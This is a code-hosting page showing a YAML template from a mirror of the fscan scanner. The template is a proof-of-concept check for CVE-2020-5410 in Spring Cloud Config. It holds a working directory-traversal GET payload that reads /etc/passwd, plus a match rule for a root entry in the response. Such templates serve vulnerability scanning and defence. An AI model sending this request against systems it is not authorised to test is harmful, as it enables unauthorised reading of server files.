qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
fscan/WebScan/pocs/spring-cloud-cve-2020-5410.yml

12 lines
443 B
YAML
Raw Blame History

name: poc-yaml-spring-cloud-cve-2020-5410
rules:
- method: GET
path: >-
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: Soveless(https://github.com/Soveless)
Affected Version: "Spring Cloud Config 2.2.x < 2.2.3, 2.1.x < 2.1.9"
links:
- https://xz.aliyun.com/t/7877
Reference in New Issue View Git Blame Copy Permalink